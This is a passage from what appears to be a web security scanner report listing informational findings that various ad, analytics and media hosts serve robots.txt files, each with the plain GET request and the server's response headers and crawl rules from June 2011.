Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
25.35. http://go.microsoft.com/fwlink/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 06 Apr 2011 05:30:27 GMT
Accept-Ranges: bytes
ETag: "7d58abbc1bf4cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:06 GMT
Connection: keep-alive
Content-Length: 95

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Allow:/fwlink/p/
Disallow:/
25.36. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052525703/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1052525703/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:16:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
25.37. http://i0.poll.fm/js/production/public-home.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i0.poll.fm
Path:   /js/production/public-home.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i0.poll.fm

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:32:50 GMT
Last-Modified: Mon, 14 Feb 2011 14:47:08 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 200
Connection: close

User-agent: *
Allow: /
Disallow: /ratings/
Disallow: /account/
Disallow: /polls/
Disallow: /surveys/
Disallow: /App/
Disallow: /Feeds/
Disallow: /poll-rss.php
Disallow: /vote.php
Disallow: /facebook/
25.38. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /sitewide/droplets/view_gen.jhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imx.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 31 Mar 2011 17:54:56 GMT
ETag: "4797a10-1cc-49fcafdbbdc00"
Accept-Ranges: bytes
Content-Length: 460
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close

Sitemap: http://www.mtv.com/sitemap_index.jhtml
User-agent: *
Disallow: /search/
Disallow: /*source=SEM_    
Disallow: /*partnersearch=
Disallow: /*searchterm=
Disallow: /*sicontent=
Disallow: /ne
...[SNIP]...
25.39. http://js.microsoft.com/library/svy/windows/broker-config.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.microsoft.com
Path:   /library/svy/windows/broker-config.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: js.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Sep 2006 01:14:33 GMT
ETag: "a948f0f8d1d6c61:0"
Server: Microsoft-IIS/7.5
VTag: 791126742900000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Tue, 14 Jun 2011 00:34:28 GMT
Content-Length: 155
Connection: close

# Robots.txt file for non www.microsoft.com hostnames (e.g. img.microsoft.com, css.microsoft.com, js.microsoft.com, ...)
#

User-agent: *
Disallow: /
25.40. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 11:04:31 GMT
ETag: "d099d3-1b-4a4038d666dc0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 14 Jun 2011 12:02:05 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.41. http://m1.zedo.com/log/p.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1.zedo.com
Path:   /log/p.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:29:11 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /
25.42. http://mswindowswolglobal.112.2o7.net/b/ss/mswindowswolglobal,mswindowswolenus,mswindowswol2dev,mswindowswoldev/1/H.17/s25014962418936  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /b/ss/mswindowswolglobal,mswindowswolenus,mswindowswol2dev,mswindowswoldev/1/H.17/s25014962418936

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "331193-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www366
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.43. http://mtv.mtvnimages.com/uri/mgid:uma:video:mtv.com:659840  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mtv.mtvnimages.com
Path:   /uri/mgid:uma:video:mtv.com:659840

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mtv.mtvnimages.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
X-Powered-By: mtvnimages.com version 1.5.56 (r248708)
ETag: W/"27-1306441848000"
Last-Modified: Thu, 26 May 2011 20:30:48 GMT
Content-Length: 27
Content-Type: text/plain
Cache-Control: max-age=22168
Date: Tue, 14 Jun 2011 00:15:00 GMT
Connection: close

User-agent: *
Disallow:
25.44. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=80626334
Expires: Wed, 01 Jan 2014 18:58:07 GMT
Date: Mon, 13 Jun 2011 14:45:53 GMT
Connection: close

User-agent: *
Disallow: /
25.45. http://now.eloqua.com/visitor/v200/svrGP.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 27 May 2011 19:27:38 GMT
Accept-Ranges: bytes
ETag: "0b15623a41ccc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 14 Jun 2011 12:28:00 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /
25.46. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s26861636964604  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s26861636964604

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2e0111-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www35
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.47. http://online.wsj.com/static_html_files/jsframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /static_html_files/jsframe.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:42 GMT
Accept-Ranges: bytes
Content-Length: 1471
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=24
Connection: Keep-Alive
Content-Type: text/plain

##ACAP version=1.0

User-agent: *
Disallow: /article_email/
Disallow: /article_print/
Disallow: /PA2VJBNA4R/
Disallow: /home/
Disallow: /advanced_search/
Disallow: /login/
Disallow: /acct/
D
...[SNIP]...
25.48. http://p.opt.fimserve.com/bht/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 14 Jun 2011 00:13:58 GMT
Connection: keep-alive

User-agent: *
Disallow: /
25.49. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-3aud4J6uA4Z6Y.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 15 Jun 2011 00:16:34 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 14 Jun 2011 00:16:34 GMT
Server: QS

User-agent: *
Disallow: /
25.50. http://puma.vizu.com/cdn/00/00/21/00/smart_tag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /cdn/00/00/21/00/smart_tag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:31 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n6), ht iad-agg-n6.panthercdn.com
ETag: "9c6e3-1a-449961c0"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Thu, 16 Jun 2011 18:10:14 GMT
Age: 367697
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 26 May 2011 21:11:43 GMT
Connection: close

User-agent: *
Disallow: /
25.51. http://s.gravatar.com/js/jquery.Jcrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /js/jquery.Jcrop.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:30:11 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
25.52. http://s0.wp.com/wp-content/themes/h4/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/style.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Tue, 14 Jun 2011 00:30:47 GMT
Last-Modified: Thu, 09 Jun 2011 17:37:13 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT ord 2
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 503
Connection: close

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...
25.53. http://s1.wp.com/wp-content/themes/h4/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.wp.com
Path:   /wp-content/themes/h4/js/scripts.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Tue, 14 Jun 2011 00:30:42 GMT
Last-Modified: Thu, 09 Jun 2011 17:37:13 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT ord 2
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 503
Connection: close

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...
25.54. http://s2.wp.com/imgpress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s2.wp.com
Path:   /imgpress

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s2.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Tue, 14 Jun 2011 00:31:18 GMT
Last-Modified: Thu, 09 Jun 2011 17:37:13 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT ord 2
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 503
Connection: close

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...
25.55. http://s7.addthis.com/js/250/addthis_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 11:04:31 GMT
ETag: "d099d3-1b-4a4038d666dc0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 14 Jun 2011 12:02:04 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.56. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:12d1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

User-agent: *
Disallow: /
25.57. http://spe.atdmt.com/ds/UXULASONYSPE/Bad_Teacher/bt_728x90_date.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/UXULASONYSPE/Bad_Teacher/bt_728x90_date.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Sat, 18 Jun 2011 19:27:40 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:
25.58. http://speed.pointroll.com/PointRoll/Media/Banners/Wrigley/866687/cp_backup_728x90.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Wrigley/866687/cp_backup_728x90.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

User-agent: *
Disallow: /
25.59. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:26 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
25.60. http://t.pointroll.com/PointRoll/Track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /PointRoll/Track/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:58f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 13 Jun 2011 14:43:00 GMT
Connection: close

User-agent: *
Disallow: /
25.61. http://tcr.tynt.com/javascripts/Tracer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:13:57 GMT
ETag: "3516526417"
Expires: Tue, 14 Jun 2011 00:43:57 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...
25.62. http://tm.verticalacuity.com/vat/visitT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tm.verticalacuity.com
Path:   /vat/visitT

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tm.verticalacuity.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Mon, 13 Jun 2011 14:42:59 GMT
ETag: "2ccd5-6e-4a4d008490a80"
Last-Modified: Fri, 03 Jun 2011 15:01:46 GMT
P3P: policyref="http://tm.verticalacuity.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 110
Connection: Close

User-agent: *
Disallow: /web/js
Disallow: /varw
Disallow: /vat
Disallow: /mon
Disallow: /vap
Disallow: /portal
25.63. http://us.adserver.yahoo.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:36 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /
25.64. http://us.bc.yahoo.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.bc.yahoo.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 14:11:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /
25.65. http://us.havaianas.com/MYOH.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.havaianas.com
Path:   /MYOH.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.havaianas.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:56:06 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 14:07:37 GMT
ETag: "3fe0026-8e-4df619a9"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /front
Disallow: /cgi-bin/
Disallow: /salert.html
Disallow: /thawte.html
Disallow: /icat/
Disallow: /missingindex.php
25.66. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s94813384910564

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1b1156-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www22
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.67. http://videopress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videopress.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: videopress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://videopress.com/xmlrpc.php
X-nc: HIT sat 101

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...
25.68. http://www.aboutads.info/modules/book/book.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aboutads.info
Path:   /modules/book/book.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aboutads.info

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Content-Length: 75
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /User-agent: *
Disallow: /User-agent: *
Disallow: /
25.69. http://www.alexa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alexa.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "1145738524"
Accept-Ranges: bytes
Last-Modified: Thu, 09 Jun 2011 22:21:44 GMT
Content-Length: 3632
Date: Tue, 14 Jun 2011 00:28:43 GMT
Server: httpd

# The crawlers listed below are allowed on the Alexa site.
# Alexa allows other crawlers on a case by case basis.

#
# Alexa provides access to traffic ranking data via Amazon Web Services.
# More
...[SNIP]...
25.70. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:13:58 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
25.71. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.148.40
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
25.72. http://www.flickr.com/apps/badge/badge_iframe.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flickr.com

Response

HTTP/1.0 200 OK
Date: Tue, 14 Jun 2011 00:21:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:21:18 GMT; path=/; domain=.flickr.com
Vary: Accept-Encoding
X-Served-By: www60.flickr.mud.yahoo.com
Cache-Control: private
Content-Type: text/plain;charset=UTF-8
Age: 2
Via: HTTP/1.1 r22.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r16.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0

User-agent: *
Disallow: /gp/
Disallow: /report_abuse.gne
Disallow: /abuse
Disallow: /signin
Disallow: /search
Disallow: /groups/10millionphotos
25.73. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 13 Jun 2011 17:45:32 GMT
Expires: Mon, 13 Jun 2011 17:45:32 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
25.74. http://www.googleadservices.com/pagead/conversion/1052525703/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1052525703/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
